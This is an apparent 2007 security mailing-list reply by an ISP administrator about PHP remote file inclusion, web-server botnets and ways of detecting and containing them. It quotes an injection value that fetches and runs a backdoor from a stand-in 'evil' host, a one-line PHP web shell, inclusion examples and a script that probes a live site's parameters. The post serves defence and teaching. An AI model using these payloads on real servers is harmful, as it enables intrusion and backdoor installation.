Message-ID: <20070220155958.GE2979@1und1.de>
Date: Tue, 20 Feb 2007 16:59:58 +0100
From: Anders Henke <anders.henke@...d1.com>
To: Gadi Evron <ge@...uxbox.org>
Cc: botnets@...testar.linuxbox.org, bugtraq@...urityfocus.com,
	full-disclosure@...ts.grok.org.uk
Subject: Re: Web Server Botnets and Server Farms as Attack Platforms

On Feb 12th 2007, Gadi Evron wrote:
> Most web servers are being compromised by these attacks as a result of an
> insecure web application written in PHP, although attacks for other
> scripting languages such as Perl and ASP are also in-the-wild.
> 
> The main reason for this is that many different PHP applications are
> available online, and often freely as open source, which makes them a
> popular selection for use on many web sites. Another reason for the
> popularity of attacks against PHP applications is that writing securely in
> PHP is very difficult, which makes most of these PHP applications
> vulnerable to multiple attacks, with hundreds of new vulnerabilities
> released publicly every month.

An important issue with this is that many people "learn" PHP by looking
at existing (free) software - and port exactly those bugs into their
own applications, or even carry them over to different platforms: vulnerabilities
found and possibly fixed in some optional phpbb/nuke plugin years ago
can still be found in quite current releases of some nuke/phpbb spinoff.

A few years ago, attackers focussed on Perl code, specifically on
insecure usage of the open() call:

# two-argument open(): a value ending in "|" is treated as a command pipe
open IN, $some_var_from_webserver;

Populate $some_var_from_webserver with a trailing " |", e.g.
"; wget http://evil/backdoor.pl ; chmod +x backdoor.pl ; ./backdoor.pl |" 
and you've found your way to execute shell commands on the remote web server.

The vulnerabilities are still there, but most current attackers have shifted 
over to PHP remote code inclusion. So the basic problem isn't new and
isn't specific to one particular language.

Over the first few years of PHP remote code inclusion, most people
pointed out that register_globals was the problem: it globally
registers any variable passed in the URI and hands it to the script.
From my own perspective, I've quite often seen customers' self-written
PHP code using things like

include($_GET["var"]);

... circumventing any illusion of security provided by a disabled
register_globals.
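
To illustrate both variants (a minimal sketch, not code from any real
application; the URLs and names are made up):

---cut
<?php
// Variant 1 needs register_globals: requesting
//   page.php?template=http://evil.example/shell.txt
// makes PHP create $template as a global before the script runs.
include($template);

// Variant 2 reads the request parameter explicitly, so it stays
// exploitable even with register_globals turned off.
include($_GET["var"]);
?>
---cut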

On the other hand, the behaviour of most "legacy" code changes so
dramatically (read: it doesn't work anymore) that exactly those
applications will fail if you disable register_globals years after
those scripts were put in place. Notifying your customers that
you'll be turning off register_globals in a few months is a guarantee
to flood your support help desk with people who can't remember whether
they're affected or not - and if so, how exactly to fix it.
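
Typical legacy code looks like this (an illustrative sketch): it
silently expects PHP to have created its variables from the query
string, so turning register_globals off makes it "stop working":

---cut
<?php
// relies on register_globals: $name and $msg appear out of thin air
echo "Hello, $name: $msg\n";

// the fix each customer has to apply, script by script:
$name = isset($_GET["name"]) ? $_GET["name"] : "";
$msg  = isset($_GET["msg"])  ? $_GET["msg"]  : "";
echo "Hello, $name: $msg\n";
?>
---cut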

The hard way would be to disable the URL fopen wrapper (allow_url_fopen)
for all customers - but this removes some required PHP functionality
(at least for more than enough customers), and those scripts are no
longer remotely, but still to some extent locally exploitable
(user A on the same server as user B puts some file into /tmp and asks
 the script via HTTP to include and execute it under B's permissions).
Something is gained, much is lost, but the problem still isn't solved.
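
The local variant, spelled out (hypothetical paths and names):

---cut
<?php
// user A, on the same box, drops a payload into a world-readable path:
file_put_contents('/tmp/payload.php', '<?php system($_GET["c"]); ?>');

// ...then requests user B's still-vulnerable script as
//   http://victim.example/page.php?var=/tmp/payload.php
// page.php runs include($_GET["var"]), so the payload executes under
// B's permissions even though remote URLs are blocked.
?>
---cut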

Yet another way would be to redirect all outgoing connections from PHP
through a transparent proxy, scanning for certain "typical" URLs or domains
you won't accept. A request for some .gif file hosted on Geocities, but
with an appended CGI parameter, e.g. something like
'GET /dir/cmd.gif?common.php HTTP/1.0', is worth denying,
as that's a current scheme of remote code inclusions.
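
Schematically, the check could look like this (a made-up helper, not
any specific proxy product):

---cut
<?php
// flag outbound requests for an "image" whose query string names a
// script - the current remote-inclusion fetch pattern
function looks_like_rfi_fetch($request_line) {
    return preg_match(
        '#^GET \S+\.(gif|jpe?g|png|txt)\?\S*\.php(\s|$)#i',
        $request_line
    ) === 1;
}

var_dump(looks_like_rfi_fetch('GET /dir/cmd.gif?common.php HTTP/1.0')); // true
var_dump(looks_like_rfi_fetch('GET /images/logo.gif HTTP/1.0'));        // false
?>
---cut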

> While in the past botnets used to be composed of mainly broadband end
> users running Windows, today we can see more and more server botnets we
> can refer to as "IIS botnets" or "Linux botnets" as a direct result of
> these attacks.
> 
> One of the conclusions we reached was that although the technologies used
> are not new (RFI, PHP shells, etc.) the sheer scale of the problem is
> what's interesting.

In another message in this thread, Tom wrote that he has been chasing
formmail-related exploits since 1995, for example. Well, I'm working as a
system administrator for an ISP and have been chasing similar scripts as well.

However, there's no silver bullet for finding those scripts, and you're
always behind reality.

MD5 hashes don't work. Users change comments, add lines, etc., and
the bugs are usually found in "official" releases as well as in
branched releases under new names (of course with new headers).
Users upload script files as binary with broken line feeds, reformatted
umlauts or special characters, some people hardcode subject lines
or change other things, so scanning for the MD5 sum of a certain
code fragment or a few "usual" lines doesn't work well enough.
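
One cosmetic edit is enough to defeat exact hashing (an illustrative
snippet; the "scripts" are made up):

---cut
<?php
// same vulnerable logic, different digest after a renamed header comment
$original = "# FormMail 1.6 by Matt Wright\nsend_mail(\$recipient);";
$edited   = "# SuperMail 1.0\nsend_mail(\$recipient);";
echo md5($original), "\n";
echo md5($edited), "\n";   // no match, so the hash blocklist misses it
?>
---cut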

Signatures don't work either. Users transcribe scripts from one language
into another. For example, I've had formmail scripts being
ported from Perl to PHP: the code was transcribed roughly line by line,
including all variable names and so on, but still including the
same vulnerabilities.

About the only thing which seems to work is actually trying to exploit
it with some "harmless" code, e.g. a remotely included script printing
a message like this:

---cut
<p><pre>
<?php
system("echo exploit tested successfully | md5sum");
?>
</pre></p>
---cut

If the PHP-parsed page contains the string
"f2ab69ebe7311e7fb16898a5cc17ae05" (in this example), it is quite likely
that the site's script is really exploitable. Write a parser to extract
all variables from a PHP script, force-feed the script with each of
those variables set to your local testing URL, and you've got your
exploit checker.
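
A rough sketch of such a checker (all URLs and filenames here are
illustrative, not a real tool):

---cut
<?php
// collect candidate parameter names from the suspect script's source:
// $_GET/$_POST/$_REQUEST indices, plus bare variables for the
// register_globals case
$source    = file_get_contents('suspect.php');
$probe_url = 'http://tester.example/probe.txt';  // hosts the echo|md5sum payload
$marker    = 'f2ab69ebe7311e7fb16898a5cc17ae05'; // the payload's known output

preg_match_all('/\$_(?:GET|POST|REQUEST)\[["\']?(\w+)["\']?\]/', $source, $m1);
preg_match_all('/\$(\w+)\b/', $source, $m2);
$params = array_unique(array_merge($m1[1], $m2[1]));

// hit the live script once per parameter and look for the marker
foreach ($params as $p) {
    $url  = 'http://victim.example/suspect.php?'
          . urlencode($p) . '=' . urlencode($probe_url);
    $page = @file_get_contents($url);
    if ($page !== false && strpos($page, $marker) !== false) {
        echo "parameter '$p' allows remote inclusion\n";
    }
}
?>
---cut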

For mail-sending vulnerabilities: one of my formmail scanners tries to
send mail to some /dev/null address, along with some specific content
which is discarded by the MTA regardless of the receiving address.
It does this in about 9 variants of parameter encoding and naming
conventions, but after all, these scanners now catch more than 98% of
vulnerable scripts. Still not perfect, but more likely the way to go than
scanning for "FormMail 1.6 by Matt Wright" if the "masterscript
collection" contains a 100% compatible replacement reusing the same bugs.
 
> In our research as detailed in the Virus Bulletin article we recognize
> that vulnerabilities such as file inclusion, as simple as they may be, are
> equivalent to remote code execution in effect.
> 
> Although escalation wars, which are reactive in nature, are a solution we
> hate and are stuck with on botnets, spam, fraud and many other fronts,
> this front of web server attacks stands completely unopposed and
> controlled by the bad guys. In our research we detail how over-time, when
> aggregated, most attacks come from the same IP addresses without these
> ever getting blocked.
> 
> ISPs and hosting farms selling low-cost hosting services can not cope with
> this threat, especially where an attack against one user running such an
> application can compromise a server running 3000 other sites.

This depends on what "low-cost hosting services" means.
There are ISPs who run even PHP content via suexec under each
individual user's permissions within tightly configured chroot jails, so at
the server level, only the single customer's space has been exploited.

Of course, from the outside you're still seeing traffic from or to
the same box hosting 3000 other sites and can't distinguish whether
it has been cleaned after a compromise, but it's important for the ISP to
know the difference between "box compromised, needs to be reinstalled from
scratch" and "single customer's space compromised, all malware can be found
in the user's $HOME or /tmp, processes killed by EUID".

Of course, your shared hosting server uses incoming =and= outgoing
firewalling to restrict potential damage as well as to alert you to
any traffic spikes; e.g. a web server should only be able to contact
53/udp at your own DNS resolvers, and you disallow incoming TCP connections
to port ranges where you won't operate a service, including ports > 1024.

At least we're automatically scanning for certain behaviours of
backdoor shell scripts and exploited spaces, automatically locking them
down and alerting the support staff to contact the affected customer,
and I don't think this is such rocket science that only we
would do so.

I'm aware that all these measures are far from perfect, and with
knowledge of what exactly I'm scanning for, most Bugtraq readers should
be able to circumvent my scanners - but they are currently catching
those bad scripts "in the wild" quite effectively.

Some process is listening on an arbitrary TCP port, disguises itself
in the process listing as "syslogd", but /proc/$pid/exe points to a file
under a customer's document root? Well, you've found
yet another generic backdoor process. Then (a sketch of the /proc check
follows the list):
- dump the process's runtime environment and block incoming TCP connections
  from or to $HTTP_REMOTE_ADDR
- run memfetch against the process to dump its current data and code into
  your local filesystem for later analysis. You don't have to gdb it -
  a simple "strings" run over the fetched files shows you more than
  enough signs of whether it is malware or not.
- in doubt: kill the process.
- if you're certain that the process is bad (it usually is ...),
  disable the abused script - the URL/script name can be found in the
  environment; chmod 000 is your own job.
- be sure to clean up the user's crontabs; many backdoors ("y2kupdate")
  install user cronjobs to restart the backdoor automatically.
- alert the user or help desk about what you've done and why you've done it.
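
The detection part, as a minimal sketch (a PHP CLI script run as root;
the document-root prefix is an assumption about your own layout):

---cut
<?php
$docroot_prefix = '/home/';   // customer document roots live below here

foreach (glob('/proc/[0-9]*') as $dir) {
    // resolve what binary the process actually runs
    $exe = @readlink("$dir/exe");
    if ($exe !== false && strpos($exe, $docroot_prefix) === 0) {
        $pid = basename($dir);
        $cmd = strtok((string)@file_get_contents("$dir/cmdline"), "\0");
        echo "suspicious: pid $pid ('$cmd') runs binary $exe\n";
        // follow-up per the list above: dump /proc/$pid/environ,
        // memfetch the image, kill the process, chmod 000 the abused
        // script, check the user's crontab
    }
}
?>
---cut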


If you script this knowledge into a regular cron job
matching your own servers' exact specifications, you've got
at least one very effective way to limit possible damage.



Regards,

Anders
-- 
1&1 Internet AG              System Administration and Security
